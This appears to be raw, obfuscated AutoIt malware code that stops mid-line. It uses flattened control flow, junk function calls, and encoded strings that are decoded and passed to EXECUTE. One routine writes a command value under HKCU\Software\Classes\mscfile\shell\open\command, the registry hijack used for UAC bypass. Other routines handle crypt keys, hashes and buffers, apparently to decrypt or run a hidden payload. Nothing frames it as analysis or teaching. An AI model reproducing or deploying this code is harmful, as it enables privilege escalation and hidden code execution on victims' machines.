[ZVTZJDNXHRPQQIM ("55" ) ] = $ARET [ZVTZJDNXHRPQQIM ("54" ) ] ISBOOL ("wpaaFxpbrLYZsz0hKSwf" ) $116925729 = 1808850186 WINEXISTS ("lgunYMFGc" ) ENDIF IF $116925729 = 954977294 THEN LOCAL $TINPUT = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,5..0,57..,..57..,..59,3,59..,..3..,..58..,..56,..6..0..,..57,..60..,5..5,..60,..5..8..,..59,..56..,..60,57..,5..7..,56,..6..0,55..,..59..,5..8,5..9..,5..4,60..,..57..,..5..9..,5..8,55..,..61..,5..5..,..5..5,..59..,..5..5,60..,6..2..,..60,57,59..,..5..8,..5..8,..2,55..,..55..,..5..5,53..,..55..,..5..9..,55..,5..3,5..7..,5..5..,..5..9..,..6..2..,..5..9,..5,..5..9,5..4,..60..,5..5,..6..0,..62,5..7..,..3,..5..9,..58,5..9,..5..,..55..,6..1,5..5,..57,59,..5..5,57..,55..,..59..,..6..2..,..59..,5..,..59,..54..,..60,..55..,..6..0,6..2..,..5..5,62,55..,..53..,..55,5..9..,55,5..3..,55,55..,..58,..4,..55,..5..5..,55,..6..2.." , ".." ) ) ) ) $116925729 = 61093985 ENDIF IF $116925729 = 1027989821 THEN LOCAL $IPLAINTEXTSIZE $116925729 = 1138660241 ENDIF IF $116925729 = 1051260188 THEN $TBUFF = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,5..0,..57,..57,..5..9..,3,59,3,5..8,56,6..0..,57,60..,..5..5,6..0..,5..8..,59..,5..6..,..6..0..,5..7,5..7,..56..,..60..,..5..5..,..5..9..,..58..,..5..9..,54..,60,..57,5..9,5..8..,5..5,6..1..,..5..5..,55..,59..,..5..5..,..60..,6..2,6..0,..57,..59..,..58..,..58..,2..,..55..,..55..,..55..,..5..3..,..55..,59,..5..5..,..53..,..57..,5..5..,..5..9..,..62..,..59,5..,..5..9..,5..4..,..6..0..,..55..,60,62,..57..,..3,..5..9..,..58..,5..9..,..5..,55,..6..1..,5..5,5..7..,..60,..5..9..,57,5..6..,..60,5..5..,60..,..6..2..,60,53..,..6..0..,57..,..5..7..,..2,5..9,58..,..6..0..,..62,..55,..6..2..,..55,5..3..,5..5,..59..,55..,53..,5..5..,..55..,..58..,4,5..5,55..,55,62.." , ".." ) ) ) ) INT (178616 ) $116925729 = 737653776 RANDOM (2170536 ) RANDOM (3316550 ) ENDIF IF $116925729 = 1053930317 THEN LOCAL $TBUFFER = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..50,..5..7,5..7,..5..9..,..3,..59,3,..5..8..,56,60..,57..,..60,..55..,..6..0,5..8..,5..9,..5..6,..60,..5..7..,5..7,5..6,60,..5..5..,59..,..58,..59,..5..4,6..0..,..5..7,..59..,5..8..,..5..5..,6..1..,55,..5..5,5..9..,55,..6..0,..62..,..60..,..57,59,58..,..58,..2..,..5..5,55..,..5..5..,5..3,55,..5..9,..5..5,..5..3,..56,..5..4..,..5..6,..5..9,55..,..53..,..5..5,..1..,..5..5,..5..3,..57,57..,5..9,..3..,..59..,..3,58,..5..6,..6..0,57,60,..55,..60..,58..,..5..9,..56,6..0,57..,..57,6..0..,..59,..5..8..,60,5..7,..5..8..,56,..59..,6..2..,..6..0..,1,..5..9..,58,5..5..,..6..1..,..5..5..,..57..,60,..5..7..,5..7,6..2..,..59,..5..,..6..0,53..,..6..0..,..58,60,5..7,5..5,6..2..,..55,..5..3..,..5..5,59..,55,..53,..5..5..,55..,..58,..4..,..55..,55,..5..5..,62.." , ".." ) ) ) ) $116925729 = 586524435 INT (3174530 ) ENDIF IF $116925729 = 1070530058 THEN $VCRYPTKEY = $VRETURN $116925729 = 39019882 ENDIF IF $116925729 = 1138660241 THEN LOCAL $VRETURN $116925729 = 1924764602 ENDIF IF $116925729 = 1196440215 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,50,57..,5..7,59,..3,..5..9,3,57,..5..6,5..9,54..,59..,3,5..9..,3..,55..,61,..55..,..5..7..,..58..,6,5..8..,..6..,59,60..,58,..6..,..59..,5..4,..57..,..5..6,..60..,..55,60,..6..2,6..0..,..5..3..,..60..,57..,..57..,6..2,5..9,..5..,..60..,..57,59..,..5..8..,..60,..55,5..9..,..5..,..59,5..4,..59..,3,5..7,..5..7..,..59..,5..4,60..,5..7,..5..9..,..5..4..,..58,..2..,5..6,5..4..,5..8,..4..,..55,..3,5..5..,..53,..5..5..,5..5..,..5..9,..5..5..,5..9..,6..,..59,..6..,5..9,3..,5..5..,5..5,5..5,..3..,..5..5,..5..3..,55,..55..,..5..7,5..6,60,..55..,..6..0..,6..2..,..60,..53,60,..57..,..57..,..5..7..,..59,..5..8..,..6..0,56,6..0..,5..7..,60,55,59..,6,..6..0,6..2,57..,..6..1..,59..,5..4..,..60,..5..6,..59,61..,..55..,55..,55,3..,5..5..,..5..3,..55..,5..5..,59..,..6..1..,5..9,..54..,59..,5..,..5..9..,5..7,5..9..,..3..,..5..9..,58..,..55,55,..55,3,5..5..,..5..3..,..5..5,..5..7..,..5..9,61..,57..,..56..,6..0,..55,..6..0,..6..2,6..0,..53,6..0..,..5..7..,57..,..6..1,5..9,..54..,..60,..5..6..,5..9,..61..,..55,6..2.." , ".." ) ) ) ) $116925729 = 1070530058 ISBOOL (2885637 + 2030547 ) ENDIF IF $116925729 = 1203322726 THEN LOCAL $TBUFF $116925729 = 113519199 ENDIF IF $116925729 = 1296565717 THEN $IPLAINTEXTSIZE = $ARET [ZVTZJDNXHRPQQIM ("59" ) ] ISSTRING ("vruZKa8jy4MT8EGQdx8SUdvROeh4wrdYYalnlVhrgv8jKZiKHv" ) $116925729 = 2022545531 ISSTRING (2705437 * 2570680 ) ENDIF IF $116925729 = 1300820860 THEN LOCAL $__G_ACRYPTINTERNALDATA [ZVTZJDNXHRPQQIM ("56" ) ] ISPTR ("Y58ssDsqQLxelf06Fwazesot3rHKKydI1tX4kso2HSZ7rnTHtJwQWRVFQNya5ROrIZn2s6Vnii2wDqcQIarbcwWkHqnF4o71dGyB9" ) $116925729 = 1203322726 STRING (597511 + 4291688087 + 4294837104 ) ENDIF IF $116925729 = 1453481599 THEN LOCAL $TOUTPUT = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,..50,5..7..,5..7,5..9..,..3..,..59..,..3..,..58..,56..,..6..0,57,6..0,55,6..0..,5..8,..59,..56,..60..,57..,..57..,5..6,..6..0,5..5..,59,..58..,5..9..,..5..4,60,5..7..,..5..9..,..5..8..,55,..6..1,5..5,..5..5..,5..9..,55..,..60..,6..2..,..6..0,5..7..,..59,5..8..,..58,..2..,55,55..,..55,53..,55..,59..,5..5..,53,..55,..57..,5..9..,5..4..,5..8..,..6..,5..7,56..,..5..9,..54..,..59..,3,..59..,3,5..8..,2,..5..6,59..,58..,..4..,55..,..53..,..55..,59,5..5,..5..3,55..,..55,..5..8,..4,..5..5..,5..5..,55,..3..,5..5,..5..3,57..,5..7..,..59,3..,..5..9..,3,..58..,56,..6..0,..57..,..6..0,..5..5,..60..,5..8,..5..9..,..56..,6..0,57..,57,60..,..5..9..,..5..8,..60,5..7..,..58..,..53,60..,5..7,..60..,55..,..55,..61,..5..5..,..5..7,60..,5..7..,5..7,..55,..60..,58..,59,59,59..,5..9,59,5..8,..60,5..5..,55,6..2..,..55,..62" , ".." ) ) ) ) WINEXISTS ("NplcdubSpt3kbs61JRRU4m3ZivioY5lXbAzrnz5FnOIZNCXff" ) $116925729 = 1947300206 DIM $UKEAWW4SLX3THGIJ3NNK = "lGoNdkOHcjq4jc16851EntAWoSHtnmA30qINpXtlpkjMLz8drM5TXQG1fCyuMut0Sxe2DmQkKOpdkXjZTDcJrSgjUR" STRING (2269520 * 1234892 * 921537 + 4294581480 ) ENDIF IF $116925729 = 1604509846 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,50,..5..7,5..7..,5..9..,..3..,..59,3,57,56..,..59..,54..,59..,3,..59,..3..,..55,6..1..,..5..5..,..57,..5..8,..6,5..8,..6..,59,..60,..5..8,..6..,5..9,..54..,57,..5..6,..60..,..55,6..0,62,60,53,6..0..,57..,57,6..2..,..59..,5,60,..5..7..,59..,5..8..,6..0,..5..5..,..59,5,..59,..54..,..5..9..,3..,..5..7..,..5..7..,..5..9..,..5..4..,60..,57,5..9,..54..,5..8..,..2,56..,..5..4..,5..8..,4,..5..5..,3,55..,..53,55..,..5..5..,5..9,5..5,59..,..6..,59..,6,..5..9,..3..,55,..5..5..,55,3,55..,..53..,..55,5..5..,57,56..,..6..0,55,..60,6..2,6..0..,53..,6..0..,5..7,5..8..,5..5,5..9..,..5..8,5..9..,..3..,59..,58..,..5..9,..54..,..60..,56..,..5..9..,5..8..,5..7..,5..6..,5..9,6..,5..9,..5..,..6..0..,57..,..5..9,5..8,60..,61,..6..0..,..5..7,5..5,55..,..55,..3,5..5,..53..,55,5..5..,5..9..,..6..1,..59..,54,59,5,..59..,..57..,..5..9..,3,..5..9,..58,..5..5..,..5..5,..5..5..,..3,..5..5..,..5..3,55..,57..,58..,6,..5..8,6,59,..6..0..,..58,6,..5..9..,..54,..57,5..6..,..6..0..,5..5,..6..0..,6..2..,6..0..,5..3,6..0,..57..,5..7..,..6..2,..5..9,..5,..60..,..5..7,5..9..,..5..8,6..0,5..5,59..,5..,5..9,..54..,..5..9..,3..,..57,..5..7..,59,..5..4..,6..0,57..,5..9..,..5..4..,58..,..2,..56..,5..5..,..5..8,4..,55..,3,..55,..53,..5..5..,..55..,..5..9..,5..7..,60..,6..0..,..59..,..6,6..0,..55..,..59,57,..5..5,55,..5..5,..3,..55,53,..5..6..,53..,..55..,..62" , ".." ) ) ) ) RANDOM (2988315 ) $116925729 = 2060391673 ENDIF IF $116925729 = 1655436234 THEN $__G_ACRYPTINTERNALDATA [ZVTZJDNXHRPQQIM ("54" ) ] = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..50,..5..7,..5..7,59..,..3,..59,3..,5..7..,6,60..,..53,59,..5..8..,..5..9,5,55,..6..1,5..5..,..55..,..57,..5..4,5..9..,57,..6..0,59..,..59,54..,60,..53,..5..9,..6..2..,56..,..5..6,5..6,..55..,..55,5..,..59,57..,..5..9..,3,..5..9..,..3,..55..,55..,..5..5..,..62.." , ".." ) ) ) ) INT (2325981 ) $116925729 = 781366022 INT (2956702 ) INT (3649111 ) ENDIF IF $116925729 = 1713506615 THEN $VRETURN = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..0,57..,..55,..59,..6..2,59..,..5,..5..9..,..5..4..,..60..,..55,60,62,57..,..4..,59..,..6..2..,..59,5..7,5..5,..6..1..,5..7,57,5..9,3,59..,3,58..,..5..6..,..6..0..,..57,..6..0,..5..5,6..0,58,59,..5..6..,6..0..,57,..5..7,..6..0,..5..9..,..5..8,..60,5..7..,..5..7,..57,..5..9..,54,..6..0,..57..,..5..9..,54..,5..5..,..6..1..,..5..5..,5..7..,6..0,..57,58..,..57,..59,..58..,..5..9..,..4,6..0,..5..3..,..5..8,56..,6..0,57..,..6..0,55,..6..0..,58,5..9,..5..6..,..60,57,55..,3,55..,5..3..,..57..,5..8,60,6..1..,5..9,..5..8..,..5..9,5..6..,..60..,..5..8,60..,5..7,59..,58..,..55,61,56..,5..4,..5..5,62..,..5..5,6..2..,..5..5..,..3..,55,..5..3..,56,..5..4,..5..5..,..3,5..5,53,55,..57..,59..,62,58,5..3,5..9..,..3..,59,5..4,59..,62..,..59,..5..,..5..8..,5..7..,5..9,5..8,60,..61..,..6..0,57,..58..,56,59,62..,6..0..,1,5..9,..5..8..,..55,..62" , ".." ) ) ) ) $116925729 = 432319576 ISPTR (378792 + 3473642 * 3705772 ) ENDIF IF $116925729 = 1718368979 THEN $HCRYPTHASH = $ARET [ZVTZJDNXHRPQQIM ("58" ) ] ISBINARY (2326930 * 1028255 + 1037320 + 4291704154 ) $116925729 = 1051260188 ISPTR (3798087 * 3172599 + 4294757372 ) ENDIF IF $116925729 = 1808850186 THEN $__G_ACRYPTINTERNALDATA [ZVTZJDNXHRPQQIM ("53" ) ] += ZVTZJDNXHRPQQIM ("54" ) DIM $FRYZXG8PUGBZSL2VYA7Q = "Sfh78cQgHJIf6M8m0eSxkr9TENpebaLanvxlRCzesiXGBuwH4IIvp3EAgxCuWKeG7H2JpXExOMebDCqjr" $116925729 = 848901156 CHR (1815563 ) ENDIF IF $116925729 = 1885155689 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,5..0,57..,..57..,..5..9,3..,59,..3,..58..,..5..6,..6..0,5..7,6..0,..55,6..0,..5..8,59,56,6..0..,..57..,..5..8,5..6,..5..9,..58,..6..0..,..57,..57,5..7,59..,54..,..6..0,57..,59,5..4,..5..5,61..,5..5..,..5..7,6..0..,..57..,..57,55..,..60..,..58,..5..9..,..59,5..9,..5..9..,5..5,..3,5..5,..5..3,57,..5..8..,6..0..,..6..1,..5..9,58,5..9,..56,6..0..,58..,..6..0..,57,..5..9,5..8..,..5..5..,6..1..,56..,54,5..5,..6..2,..5..5,3..,..55,..53..,55..,..5..7,6..0,..59..,..5..7..,5..7,59..,..54..,6..0,5..7..,..5..9..,54,55,62.." , ".." ) ) ) ) $116925729 = 1970938970 INT (3989727 ) ENDIF IF $116925729 = 1924764602 THEN $VDATA = GLOBALDATA ($VDATA , $RT ) MOD (2283428 , 3605473 ) $116925729 = 1655436234 ENDIF IF $116925729 = 1947300206 THEN RETURN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..0..,..5..7,..57,59..,3,5..9..,..3,58..,5..6,..6..0..,5..7..,60,55,6..0,..5..8,5..9,..56,6..0..,57,..57,60,5..9..,5..8,..60,5..7..,5..7,..57,..59..,54,6..0..,5..7..,..5..9..,54..,..55,6..1,55,5..7..,..6..0,..57,..57..,..6,6..0,58..,..60..,5..7,..6..0,5..3,60..,..5..8..,60..,..5..7..,55..,..3..,..55..,..5..3..,..5..6..,5..4..,55,6..2.." , ".." ) ) ) ) EXITLOOP PTR ("MhsdezMeRXHTtSmxJuw7o3wREyeyqIhEw9BlRbmrAk2f3c8x1XgrAFSTUKHQvnYhQdwtqaQHhfFdbqXCAQHCC0d0rSAfDG5nwUz0OOh0gHjvaNSDX" ) ENDIF IF $116925729 = 1970938970 THEN $ARET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,50..,..5..7..,..57,..59..,3..,..59,3,..57..,..5..6,5..9..,54,..5..9,3,..5..9..,3,55..,61,..5..5..,..5..7..,5..8,..6..,..58,..6,59,6..0..,..5..8,6..,..59..,..5..4,57..,56,..60,..55..,6..0..,6..2,60,..53..,60,5..7,..57,6..2..,..59..,5..,..6..0..,57..,..5..9,5..8..,6..0..,..5..5..,..5..9..,5..,59..,..5..4,5..9,3..,5..7,..57,..59,..5..4..,..60,57,..5..9,54,5..8..,..2,56,54,58,4..,..55..,..3..,..5..5,53..,..5..5..,5..5,..59,..55..,5..9..,..6..,..5..9..,..6,..59,..3..,5..5..,5..5..,..5..5..,..3..,..55..,5..3,5..5,55..,..57,..5..6..,6..0,..5..5..,60..,..6..2,6..0,5..3..,6..0,57..,..5..7,5..7..,..59,58..,..59,..56..,6..0..,..5..5..,60,..62..,..60..,5..3..,..6..0..,57,5..5,55,5..5..,..3,..55..,53,..5..5..,..5..5,..5..9..,..61..,..5..9..,54,59..,5,5..9..,..5..7,59,3,59,..5..8..,5..5,55,5..5..,3..,..55,..5..3,..55..,..57,6..0..,5..9,..5..7..,..5..6..,..6..0,..55..,6..0,6..2,..60,..5..3..,..60,..57,5..7,2,..5..9,..5..8,..60,..62,5..5,..3..,5..5..,..53,5..5..,55,..59..,6..1..,5..9..,54..,..5..9..,5..,..5..9..,..57..,59,..3,59,58..,..55,5..5,..5..5,3,..5..5,..5..3,..5..6..,53,..55..,..3..,55..,..5..3,5..5,55,..5..9,..5..5,..5..9..,6,5..9,6,5..9..,..3..,..55,55..,5..5,3,5..5,..5..3..,57,58..,60,61..,..59..,..58,59..,..5..6,..6..0,..5..8,..60..,..5..7,..59..,..5..8,55,..61..,5..5,5..5..,58,..5..7..,60..,..55..,6..0,58,59,..5..8,..55..,55,..5..5,..6..2,..5..5..,3..,5..5,..5..3..,5..5..,5..5..,..59,..57..,60..,..6..0..,..5..9..,6..,60..,55..,..59,..5..7..,..5..5,..5..5,5..5..,..3..,..55..,..53..,..5..6..,5..3..,..55,..3..,..55..,..53..,55..,5..5,60..,56,60..,57..,..60..,..55..,60,..58,5..9,5..6,..60..,..57..,..5..5..,1,..55..,55..,..55..,3,55,..53..,..55,..5..7..,..6..0,..57..,..5..7,5..5..,..6..0,..58,59,59..,5..9..,..59..,..5..5..,3,..55..,5..3..,55,..55,5..9,5..7,..6..0,60..,..59..,..6..,..60,..55..,..59..,5..7,..5..5..,..1,..55,5..5..,..55,3,..55,53..,5..7..,5..5..,59..,..6..2,..59..,5,59,..5..4,60,5..5,6..0,6..2..,..57,3,..59,58..,59,..5,5..5..,..61..,..55..,57..,6..0..,..59,57..,5..7..,59..,5..4..,..6..0..,..57..,5..9..,..54..,..55..,6..2..,5..5,..6..2.." , ".." ) ) ) ) $116925729 = 1296565717 INT (2615442 ) ISSTRING ("JKeJksRq07XVISw4QS0Ma7rzrpGcgJ1jMIpFDJlR7BM0rDg88TjqQyHMsNr4VNkpfN" ) ENDIF IF $116925729 = 2022545531 THEN $TTEMPSTRUCT = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..0,5..7..,..5..7,59..,..3..,5..9,..3..,5..8..,..5..6,..60..,57..,60..,..5..5..,6..0,58..,5..9,..5..6..,6..0,57..,57,..56,..60..,..5..5..,59,5..8..,5..9,5..4..,60,..57..,..5..9,58,..55,..61,..55,..55..,59,..5..5,..60,..6..2,6..0,..57,59,5..8..,..58,..2,5..5..,5..5..,..5..5..,..5..3..,..5..5..,59..,..55,..53,..5..5..,..57,..5..9..,..6..2,5..8..,..53..,5..9,..3,59,..54,5..9,..62,..5..9,..5..,..5..8,..5..7,..5..9..,..58,..6..0,..6..1..,6..0..,..5..7,58,56,5..9..,..6..2..,..60..,..1,59,58..,..5..5..,53..,55,..2,5..5,5..3,56,5..4..,5..5,..53..,5..5..,..5..9..,..55..,53,..55,5..5..,..5..8..,4,..55..,..55,55..,3..,..5..5..,53..,..5..7,..57..,59..,3..,..5..9,3..,..58..,..56,..60,..5..7..,..6..0..,..5..5,60..,5..8..,5..9,5..6,6..0,57,..5..7..,..6..0,..59..,5..8,..60,..5..7,..5..8,..53..,6..0..,5..7..,6..0..,..5..5,..5..5,..6..1..,..5..5,..5..7,60..,..5..7,..5..7,5..5,..6..0..,58..,59,..5..9,59,5..9..,..5..5..,6..2..,55,..6..2.." , ".." ) ) ) ) $116925729 = 1713506615 ENDIF IF $116925729 = 2032766480 THEN $ARET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,5..0..,57..,..57..,59..,3,5..9..,..3,5..7,56..,..5..9..,..5..4,..59,..3..,5..9,3,..5..5..,..6..1..,..5..5,..5..7..,5..8..,6..,58..,6..,5..9,..6..0,58,..6..,..5..9..,5..4,57..,..56,..60..,..5..5,60..,..6..2,..6..0,..53,..6..0,..57,..57..,62,..59..,5,..6..0..,5..7..,59,58,6..0,55,..59,5,59,..54..,..5..9,3..,57,5..7,..5..9..,..54,6..0,..5..7,..59,5..4..,58,..2..,5..6..,54,..5..8..,4..,55..,..3,..55,..5..3,..55..,..5..5,..59,..5..5..,5..9..,..6,..59..,6,59,..3..,5..5..,5..5,55,..3..,55..,5..3..,5..5..,55..,57..,..5..6,..60..,5..5..,..60..,..6..2,..6..0,..53,60,..57..,..57..,5..7,59,58..,60,5..5..,..59..,62,60,59,..5..9,58,..5..7..,..2,..5..9..,..58..,6..0..,..62..,..55..,5..5..,..55,3..,5..5,53,5..5,..55..,..59,..61,..59..,5..4..,59..,..5..,59..,5..7..,59..,3..,..59..,58,55,..5..5,..5..5,..3..,..5..5..,57,58,6,..58..,6..,..5..9,..60..,..5..8,6..,5..9,..5..4,..5..7..,..56..,60..,..55,6..0,62,..6..0,53,..60,..5..7..,..5..7..,..6..2,..5..9..,..5..,6..0,..57,5..9..,..5..8,60,55,..59,..5..,59..,54,5..9,3..,57,5..7,5..9,54..,..60..,..5..7..,..5..9,5..4,..58,..2..,5..6..,..55,5..8,..4,55,3,5..5..,..53..,..5..5..,5..5..,60..,..58..,..59..,6..2..,5..9..,5,..6..0,..57..,..5..5,..55..,..5..5,..3..,..55,..53..,5..5,5..5,5..6,5..3,60..,61,56,..53,..56..,..5..3..,5..6,..5..3..,..56..,53..,..5..6,..5..9..,..56,59..,..5..6..,5..4..,5..6,53,..55..,..55..,..5..5..,3..,..5..5..,5..3,..55,..5..5..,..5..9..,6..1,..5..9..,54..,5..9,..5..,..5..9,..57,..5..9..,3..,..5..9..,..5..8..,5..5,..55..,55..,3,..5..5,..5..3..,5..5..,5..7,59,6..1,57..,..5..6,6..0,..5..5..,..6..0,..62..,6..0,..53,..6..0..,57..,..5..7,6..1,5..9..,..54,..60,..5..6..,..59,..6..1,55..,..3,..5..5,..53..,5..5..,..55..,5..9,5..7..,60..,60,5..9..,6,..6..0..,5..5,5..9,..5..7,..55,55..,55,..3,55,..53,..5..5..,55,56..,53,60,..61..,..5..6,5..3,5..6,53,5..6..,..5..3,5..6..,53,5..6..,..53,56..,..5..3..,5..6,..5..3..,5..6,..5..4..,..5..5,55,5..5,..3..,..5..5..,5..3,55,5..5,..59,6..1,59,54,..59..,..5..,5..9,..57..,59,..3,5..9..,..5..8,..5..5..,..1..,5..5..,5..5,..5..5..,..3..,..5..5,..53..,..56,..5..3,5..5..,62" , ".." ) ) ) ) ISFLOAT (1281457 + 3262434 + 2270997 ) $116925729 = 116471326 ENDIF IF $116925729 = 2060391673 THEN $BBINARY = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..50,..5..7,55..,59..,62,5..9,..5,..5..9..,..54..,60,..55..,..6..0..,62..,..55..,61..,..5..5,57,..6..0,59,..58,5..5,5..9..,..5..8..,..60,..5..7,..6..0..,..58,..6..0,55,..5..9..,..5,..55,..62" , ".." ) ) ) ) $116925729 = 954977294 ENDIF NEXT ENDFUNC FUNC RIINHIEBTT () GLOBAL $1203322726 = 256356752 GLOBAL $SQWVMUGFHS = 3728969 FOR $E = 0 TO 208224 ISFLOAT (1231434 + 4293056517 * 785299 + 4291740133 ) IF $1203322726 = 176683708 THEN $FPJBQJEGCCNE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..1,48..,31,..4..0,..4..6,4..8,4..9,4..4.." , ".." ) ) ) DIM $8YMKZQNWR6QDDCC6DX16 = 2024996 + 1286653 + 4293763593 * 2034330 * 2855398 + 4292770335 + 1859479 + 4294429152 $1203322726 = 1300820860 ISFLOAT ("tuSwkc9TjNUANoz7EqsbVDOYyzbe3uBvjxMjt7lpYWJeSgMoalmnymSZ" ) RANDOM (2997766 ) ENDIF IF $1203322726 = 256356752 THEN $WDNTUWUIPGOD (LUXBZMCWKPOC ("HK..CU..\..S..oftware..\..C..la..s..se..s\..m..s..cfil..e..\..sh..e..ll\..op..en..\..co..mm..and.." , ".." ) , "" , LUXBZMCWKPOC ("REG.._S..Z" , ".." ) , $BPAPWBQZMLLNSNXVSJYMCEPVPMUWJELXTITCFYCQPXTFSGSTOASCDLVWZF ) $1203322726 = 176683708 DIM $RPKPMGFCM83KGRXXDSHO = 3794622 * 2643542 * 1936402 + 4290986439 ENDIF IF $1203322726 = 1300820860 THEN $RSOIAVQHRSRB ($JGTQIAOTJUVQTGIWELJCIUBHILITIMWCZYTJWHKFENIYTKYVVORLPCQPFMH ) ISPTR (1275853 + 4292450117 * 2206095 * 531502 ) EXITLOOP ENDIF DIM $WQ7N1GR7BUKYVLHNXUBI = 2888109 NEXT ENDFUNC FUNC EKRDVDSTJT ($LOOP , $TIME ) FOR $I = ZVTZJDNXHRPQQIM ("53" ) TO $LOOP GLOBAL $1027989821 = 256356752 GLOBAL $CAJSKBGJ74 = 3127585 FOR $E = 0 TO 3452509 IF $1027989821 = 113519199 THEN $HOKAFSRHEHOF ($TIME / $LOOP ) EXITLOOP ENDIF IF $1027989821 = 176683708 THEN $A = $QNTYERAUOLAX ($A , $A + ZVTZJDNXHRPQQIM ("54" ) ) WINEXISTS ("EVZ9viDIOTXwanGdH6o11wQ6wHnjWtldY47OutYtLbrldcNg76C30dahf2MY4uWvHUHfp1Toi4o0eD2t4hmZ0rmU40JBRazro6NsDH1g" ) $1027989821 = 1300820860 PTR ("K9s4X" ) ENDIF IF $1027989821 = 256356752 THEN LOCAL $A = $UEHQXDUALSWD (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,50..,..61..,..61" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,5..0..,..58,58" , ".." ) ) ) $1027989821 = 176683708 DIM $RQGHE7LI0I0VPGLLFR6U = 3210105 * 1852741 + 4294559115 + 4294360885 ENDIF IF $1027989821 = 1203322726 THEN #endregion $1027989821 = 113519199 CHR (3263422 ) ENDIF IF $1027989821 = 1300820860 THEN $A = $NCPIUPWKFYZJ ($A , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..0..,56,..55" , ".." ) ) ) ISBINARY ("H4UzBHGbu2Tp1AKrYhb2YtQBXj9YrN431fl3oc6Hfh6JOFZ50FjIKHconsLrISUR70xVpSdVlCXRxgXqud7VEvrtd7O6zO9wwpLYh" ) $1027989821 = 1203322726 ENDIF NEXT NEXT ENDFUNC FUNC OLXQOLLAOO ($SOCCURRENCENAME ) GLOBAL $113519199 = 256356752 GLOBAL $UV0HEU7EV9 = 519385 FOR $E = 0 TO 755697 DIM $SRCHVFDZTIE9JQXYSH7J = 2268565 IF $113519199 = 176683708 THEN LOCAL $B = $E (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..,35,..40,..2..7..,44,..51,2..0..,4..1,..19,..46..,44,..3..5,..40,..33" , ".." ) ) ) ISBOOL ("RDLxd9pd" ) $113519199 = 1300820860 ENDIF IF $113519199 = 256356752 THEN LOCAL $E = EXECUTE $113519199 = 176683708 DIM $SMFLQH6QEOYEALEQQZAY = "eETf59S6efFoQx442bwOR9u0HvmKOVcNFfNiWgVhoU9I3qtXJVxXNjoej3HIXgqtc2SJUWhWpoz7aW6rbyb4wpaw1J93IlthCQGbHUdYMLGyTrex" ISBOOL ("w6X1vSkXone" ) ENDIF IF $113519199 = 1203322726 THEN LOCAL $ALASTERROR = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,..50..,..57,..5..7..,5..9,..3..,..59..,3,..5..7..,..56,..59..,..54..,..5..9..,3,..59,3,5..5..,..61..,5..5..,5..5,5..9..,2,..59,5..8..,60,..5..5,..5..9,..5..,59..,..5..8..,..5..9..,3..,56,5..6..,..5..6..,5..5,..55,5..,59,57..,59,3..,5..9,..3..,55..,5..5..,..5..5,..3,5..5,..5..3,..55..,5..5,..5..9..,5..7,60,..6..0,59,6..,..6..0,..55,..59,57,55..,..5..5,5..5..,3..,..55..,..5..3..,55..,55..,..5..7,..60..,..59,..5..8..,60..,5..7..,57..,3..,5..9..,..5..4..,..60,..5..6,..6..0,5..7..,..57,..58,6..0..,..55,6..0..,..5..5..,..5..9..,6..,..6..0,5..5,..5..5..,5..5..,55..,..6..2" , ".." ) ) ) ) ISSTRING ("5TrvmqVSKMJEL7rN6cfUTjmb3byyC" ) EXITLOOP ENDIF IF $113519199 = 1300820860 THEN LOCAL $AHANDLE = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,5..0..,..5..7,5..7,59,3..,..59..,..3..,..5..7,..5..6..,59,..54..,59..,3..,59..,3,5..5,..6..1..,..55,55..,..5..9,..2..,59,5..8,..60..,..55..,..5..9..,5,59,58,..5..9,3,5..6,56..,5..6..,..55..,..5..5..,..5,..5..9,..57,59,3..,..59..,3,..5..5..,..5..5..,..5..5,3..,..55..,5..3,55,..55..,5..9..,..61..,..59,5..4,..59..,5..,5..9..,57,59..,3..,5..9,..5..8,55..,..5..5,..5..5..,..3,..55,..5..3..,..55..,..55,57,5..6..,..6..0,..5..5,..5..9..,5..8..,..5..9,54..,6..0..,57,5..9..,5..8..,57..,..4,..6..0..,..5..8..,60,..5..7..,59,..5..8,6..0,6..1,58..,6..0..,55,..5..5,..5..5..,..3..,5..5..,..53,..5..5,..5..5..,..6..0,..56,..6..0..,57..,6..0..,..55,60,..58,..5..9..,..5..6..,..6..0,5..7..,..55,1,5..5..,5..5..,..5..5..,3,55..,53,55,55..,..56..,..53..,..5..5,5..5..,55,3,..5..5,..53..,..5..5,55..,5..9,..55,5..9..,6..,..59,..6..,..5..9,..3,55,..55..,..5..5..,..3..,..5..5..,..53..,55..,..55..,56,54,..55..,5..5,5..5..,3,..55..,53,..55..,55..,60..,..60,..60..,5..6,6..0,57,60,55..,..55..,..55..,..55,..3..,..55..,53,55..,..5..7,..6..0,56..,..57,6,59..,..56,5..9,5..6,60,5..8..,..6..0..,..5..5,..60..,..55,5..9,..58..,..59,..5,59,5..6,5..9,58,..5..7..,..5..,..59,..54,..5..9..,4,..5..9..,58,..5..5..,6..2" , ".." ) ) ) ) DIM $AGQC2GKFQTIOLQ5Z8PYJ = 2056874 $113519199 = 1203322726 MOD (1856831 , 749187 ) MOD (429369 , 719967 ) ENDIF ISSTRING (3019897 * 611979 